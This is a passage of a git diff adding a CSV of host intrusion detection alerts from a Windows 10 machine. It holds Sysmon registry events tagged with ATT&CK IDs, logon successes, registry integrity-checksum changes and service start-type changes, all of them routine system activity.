10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 26, 2020 @ 10:45:28.086",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.094289900Z"",""eventRecordID"":""572"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.050",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.093326400Z"",""eventRecordID"":""571"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 26, 2020 @ 10:45:28.005",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.092786400Z"",""eventRecordID"":""570"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:27.971",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.087247900Z"",""eventRecordID"":""569"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 26, 2020 @ 10:45:27.930",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.087026700Z"",""eventRecordID"":""568"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.605\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.605"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.605 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:27.881",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.086173700Z"",""eventRecordID"":""567"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 26, 2020 @ 10:45:27.867",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.085933900Z"",""eventRecordID"":""566"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:27.833",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:23.845531500Z"",""eventRecordID"":""564"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 26, 2020 @ 10:45:27.815",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:23.844286400Z"",""eventRecordID"":""563"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.590\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.590"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.590 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:22.897",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:45:22.502",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:22.456",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x31A1C + Linked Logon ID: 0x319ED + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. 
+ +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:22.394",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x319ED + Linked Logon ID: 0x31A1C + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. 
+ +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:21.429",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 26, 2020 @ 10:45:19.950",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 26, 2020 @ 10:44:29.900",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:44:29.835",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:44:25.743",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:43:47.507",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '1c2ba1597228115961d6328c1fe5d3a2' +New md5sum is : '4fb3bba13c938530aea3422bc2522f8e' +Old sha1sum was: '24110a9e96de59086bd21fa5431c88af7ee637a0' +New sha1sum is : '67a286693aec034ff7ebf4413b445dd59437c852' +", +"Apr 26, 2020 @ 10:43:47.492",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa' +New md5sum is : 'a1b7a53a5551301f83ed8744ce80ef20' +Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19' +New sha1sum is : 'c821e211eae5268acc65fd3cfadebc4d47232039' +", +"Apr 26, 2020 @ 10:43:23.399",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:43:02.664",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 26, 2020 @ 10:41:33.647",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:08Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:41:11.225",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : 'f6d600c5cc1ac72a221ff4e232c17714' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '367298db73f7b22370cfd87e0e07a3b3be279d67' +", +"Apr 26, 2020 @ 10:41:11.194",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '9a884b6415b722e0fe5b199f5489a78b' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'cf1e6c9ac71618055946e3482c6af9afb43e823a' +", +"Apr 26, 2020 @ 10:40:51.695",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:26Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:40:11.872",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1635805 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 26, 2020 @ 10:40:10.996",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '9d9105652e2f7b4afa5cb007b7d91920' +New md5sum is : '1c2ba1597228115961d6328c1fe5d3a2' +Old sha1sum was: 'f8cdf7cd739982a615ae6807a053614f911273d8' +New sha1sum is : '24110a9e96de59086bd21fa5431c88af7ee637a0' +", +"Apr 26, 2020 @ 10:40:10.983",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. 
+Old md5sum was: '9b2eb62ca4c74330ffa1448b22e6dfac' +New md5sum is : '4ba4365f07f1541a9d0cb4adc696cbaa' +Old sha1sum was: '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +New sha1sum is : '6766757ccbe9ec12bc588faf319b992e7bd63e19' +", +"Apr 26, 2020 @ 10:39:05.687",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:40Z. Reason: RulesEngine.""" diff --git a/data/MW_19_HIDS_3.csv b/data/MW_19_HIDS_3.csv new file mode 100644 index 0000000..aeea9a2 --- /dev/null +++ b/data/MW_19_HIDS_3.csv 
